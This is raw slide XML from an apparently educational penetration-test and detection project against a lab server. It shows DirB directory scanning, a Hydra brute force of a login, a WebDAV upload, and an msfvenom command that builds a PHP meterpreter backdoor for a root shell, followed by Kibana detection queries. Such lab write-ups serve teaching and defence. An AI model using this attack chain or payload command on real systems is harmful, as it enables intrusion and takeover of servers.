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81" r:id="rId13"/>
    <p:sldId id="278" r:id="rId14"/>
    <p:sldId id="266" r:id="rId15"/>
    <p:sldId id="267" r:id="rId16"/>
    <p:sldId id="268" r:id="rId17"/>
    <p:sldId id="269" r:id="rId18"/>
    <p:sldId id="270" r:id="rId19"/>
    <p:sldId id="279" r:id="rId20"/>
    <p:sldId id="271" r:id="rId21"/>
    <p:sldId id="272" r:id="rId22"/>
    <p:sldId id="273" r:id="rId23"/>
    <p:sldId id="274" r:id="rId24"/>
    <p:sldId id="275" r:id="rId25"/>
    <p:sldId id="282" r:id="rId26"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId28"/>
      <p:bold r:id="rId29"/>
      <p:italic r:id="rId30"/>
      <p:boldItalic r:id="rId31"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black" panose="020B0604020202020204" charset="0"/>
      <p:bold r:id="rId32"/>
      <p:boldItalic r:id="rId33"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId34"/>
      <p:bold r:id="rId35"/>
      <p:italic r:id="rId36"/>
      <p:boldItalic r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin" panose="020B060402020202020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347707-443D-484B-A753-5A811792EB8A}">
  <a:tblStyle styleId="{3B347707-443D-484B-A753-5A811792EB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9" d="100"/>
          <a:sy n="209" d="100"/>
        </p:scale>
        <p:origin x="420" y="11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26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217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47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34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29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9" r:id="rId5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05/webda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05/webda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1.105/webdav/php_backdoor.php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paste.com/2015/02/stop-file-path-traversal-attack-apach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bianadmin.com/how-to-protect-apache-against-dosddos-or-brute-force-attack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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3100" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>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4064" y="3767328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 McCall August 2021</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1diode@gmail.com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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hidden Directory Discovery - DirB</a:t>
            </a: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426308" y="1486523"/>
            <a:ext cx="2669467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</a:t>
            </a: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DirB (DirectoryBuster) scans a target server directory tree using a dictionary list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NB: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Browsing the company website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>also revealed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that a /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referenced in a personal BIO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575"/>
            <a:ext cx="2260867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DirB identified two unseen web server directories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/server-status 403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/webdav 401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Metasploit msfconsole </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="12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also found the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/webdav directory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utoShape 2" descr="dirb http://192.168.1.1Ø5 &#10;DIRB v2.22 &#10;By The Dark Raver &#10;START_TIME: Tue 6 2ø21 &#10;URL_BASE: http://192.168.1.1Ø5/ &#10;nRDLIST_FILES: /usr/share/dirb/nrdlists/c—on. txt &#10;GENERATED n-RDS: 4612 &#10;scanning URL: http://192.168.1.1ø5/ - &#10;+ http://192.168.1.1ø5/server-status &#10;+ http://192.168.1.1ø5/wet)dav &#10;END_TIME: Tue Jut &#10;DOWNLOADED: 4612 &#10;6 2ø21 &#10;- FOUND: 2 "/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="123825" y="-1951038"/>
            <a:ext cx="45148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67" y="1480575"/>
            <a:ext cx="3342834" cy="3009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64" y="3920869"/>
            <a:ext cx="2756952" cy="605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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brute Force Attack - Hydra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696809" y="1457028"/>
            <a:ext cx="2560907" cy="340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Hydra combines an already known username with a password dictionary to brute force a web login page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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GB" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>User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GB" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>R’s password hash was cracked using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Webtool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09827" y="1390744"/>
            <a:ext cx="2619313" cy="33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Hydra produced a password for user name ‘A…’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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So read write access was gained to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http://192.168.1.105/webdav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via file explorer and web browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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Found in /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is the file ‘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passwd.dav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’ that contained instructions and password hash for user ‘R…’ to access /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en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>NB: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User A and R credentials also permit SSH to the target   ‘server1’ An exploitation avenue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63" y="2156319"/>
            <a:ext cx="1955733" cy="1928778"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="AutoShape 2" descr="Last login: Tue may 19 16:51222 2ø2ø &#10;ashtonaserverl: -$ id &#10;groups-1øø2(ashton) "/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="123825" y="-419100"/>
            <a:ext cx="44767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982" y="1466597"/>
            <a:ext cx="2751176" cy="107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081" y="4242938"/>
            <a:ext cx="2626070" cy="51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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File upload /webdav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4" y="1457028"/>
            <a:ext cx="2504681" cy="340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Employing user  ‘R…’ credentials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File manager was used to access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av://192.168.1.105/webdav</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US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</a:b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And via browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
              <a:hlinkClick r:id="rId3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http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://192.168.1.105/webdav</a:t>
            </a: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09827" y="1421634"/>
            <a:ext cx="2619313" cy="33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A malicious PHP payload file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php_backdoor.php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” created in the next step…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Was placed in the /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directory for future use</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:b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NB: /webdav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is a HTTP/s extension permitting shared folders. Is commonly used </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en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as an administrative tool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In this case the HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>authentication is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in the clear and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>credentials not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secure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2" y="1587983"/>
            <a:ext cx="2537365" cy="13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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse Shell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4" name="Google Shape;1134;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479364" y="1277423"/>
            <a:ext cx="2719084" cy="942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Tools &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="e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Processes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was used to create </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="12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php_backdoor.php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payload payload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440278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kumimoji="0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71280"/>
            <a:ext cx="2481192" cy="33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  <a:defRPr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total takeover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server1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" sz="1200" noProof="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noProof="0" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Web browsing the URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" noProof="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https://192.168.1.105/webdav/php_backdoor.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" noProof="0" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> triggers a TCP connection on TCP port 4000 from the target back to pentest machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:defRPr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At the pentest machine a meterpreter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console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starts</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1200" noProof="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command ‘shell’ provided a remote console with root privileges.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" sz="1200" noProof="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" sz="1200" noProof="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12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AutoShape 2" descr="rm /usr/share/davtest/backdoors/php_ba door. php &#10;msfvenom -p php/meterpreter/bind_tcp LPORT•4øøø &gt; /usr/share/d &#10;avtest/backdoors /php_backdoor. php &#10;[-1 No platform was selected, choosing Msf frcm the &#10;payload &#10;[-1 No arch selected, selecting arch: php from the payload &#10;No encoder or badchars specified, outputting raw payload &#10;Payload size: 1338 bytes &#10;1 &#10;rootaKal i : "/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="123825" y="-822325"/>
            <a:ext cx="59817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m /usr/share/davtest/backdoors/php_ba door. php &#10;msfvenom -p php/meterpreter/bind_tcp LPORT•4øøø &gt; /usr/share/d &#10;avtest/backdoors /php_backdoor. php &#10;[-1 No platform was selected, choosing Msf frcm the &#10;payload &#10;[-1 No arch selected, selecting arch: php from the payload &#10;No encoder or badchars specified, outputting raw payload &#10;Payload size: 1338 bytes &#10;1 &#10;rootaKal i : "/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="276225" y="-669925"/>
            <a:ext cx="59817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30" y="2067165"/>
            <a:ext cx="3183353" cy="672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3" y="3021717"/>
            <a:ext cx="2031407" cy="183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3861" y="2964087"/>
            <a:ext cx="10310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Setup </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Handler.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enter</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘exploit’ to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Activate it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9934" y="1548278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/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>On target host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>192.168.1.105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525" y="1976908"/>
            <a:ext cx="2936875" cy="16383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5" y="3672922"/>
            <a:ext cx="2942429" cy="1026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082" y="2795639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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Msfconsole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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scan - nmap</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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965419" y="680512"/>
            <a:ext cx="6950914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 smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>port scan is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0"/>
              <a:t>detected when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>a single host rec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>ei</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0"/>
              <a:t>ves </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>a high number of unique TCP port numbers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0"/>
              <a:t>as TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>SYN connection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0"/>
              <a:t>attempts where TCP ports are not open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0"/>
              <a:t>At </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>08:52am local time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>91,983 packets were sent to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>192.168.1.105</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1200" dirty="0" smtClean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  <a:p>
            <a:pPr marL="152400" lvl="0">
              <a:buSzPts val="1200"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0">
              <a:buSzPts val="1200"/>
            </a:pP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70" y="835137"/>
            <a:ext cx="319085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84" y="2171260"/>
            <a:ext cx="2883450" cy="25320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1912" y="1647663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400" lvl="0">
              <a:buSzPts val="1200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" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>unique </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>count of destination ports” (port numbers) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>  per 30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>minute slice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>24 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>hours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30" y="2104779"/>
            <a:ext cx="4799853" cy="2598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8314" y="1634820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Errors recorded when connection attempts to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>ports that don’t exist failed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Request for the Hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Directory - DirB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9" y="1608833"/>
            <a:ext cx="5106798" cy="2632245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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276820" y="741300"/>
            <a:ext cx="5908080" cy="659933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Font typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>2 additional folders on host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0"/>
              <a:t>192.168.1.105 were discovered</a:t>
            </a:r>
            <a:endParaRPr lang="en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/>
              <a:t>Starting 9:54:21 local time 4612 attempts were made using DirB</a:t>
            </a:r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71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434538" y="779777"/>
            <a:ext cx="3820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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Target folder:         DIRB Result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p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Server_status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  403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forbidden</a:t>
            </a:r>
          </a:p>
          <a:p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        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   401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authentication required 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         The login page is accessible</a:t>
            </a:r>
          </a:p>
          <a:p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this chart=     A high number of HTTP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404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“Not 	         Found” responses are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produced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	         when non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existent folders are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	         tested by DirB</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="12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         NB: DirB was used multiple 	         times   </a:t>
            </a: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Uncovering the Brute Force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack - Hydra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284849" y="741300"/>
            <a:ext cx="7470618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Font typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>password for the user ‘a…’ was discovered</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0"/>
              <a:t>An attack comprising </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>410,162 packets brute force tested </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>10,134 passwords until successful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Discovered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0"/>
              <a:t>credentials were also sufficient for SSH access to server1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pP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8" y="1462475"/>
            <a:ext cx="4713682" cy="22763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7910" y="4010846"/>
            <a:ext cx="8263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destination.ip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: 192.168.1.105 and query : "GET/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/" and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user_agent.original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"Mozilla/4.0 (Hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="12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)“ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="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(NB: This search was specific to the Hydra tool – otherwise drop the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="8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user.agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="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part of search and look for excessive HTTP responses that are not 200)  !=200</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="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69" y="2172069"/>
            <a:ext cx="3412862" cy="1702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894" y="1648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Failed attempts 11:00 to 12:00 received </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
            </a:b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by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pentest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machine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282719" y="741300"/>
            <a:ext cx="8509914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W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>ebdav use can be identified by the the string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0"/>
              <a:t>‘PROPFIND’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>in kibana ‘query’ field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>And </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0"/>
              <a:t>via HTTP requests </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0"/>
              <a:t>uri.path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>to /webdav/ directory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/>
              <a:t>Correct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>credentials provided </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0"/>
              <a:t>read write access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>to the /webdav directory</a:t>
            </a:r>
            <a:endParaRPr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/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>asswd.dav was retrieved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0"/>
              <a:t>from this folder revealing further information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 smtClean="0"/>
              <a:t>Later at 13:27 the malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0"/>
              <a:t>‘php_backdoor.php’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>was placed in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0"/>
              <a:t>/webdav directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>for future use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7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2" y="2226733"/>
            <a:ext cx="5881492" cy="2493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86966" y="2144349"/>
            <a:ext cx="3111501" cy="270866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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse Shell Connection - Meterpreter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265800" y="680742"/>
            <a:ext cx="8308993" cy="386245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 smtClean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smtClean="0"/>
              <a:t>msfconsole TCP reverse shell use may be detected by a unique default user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>agent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>string  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0"/>
              <a:t>Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>However this can be changed by the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640">
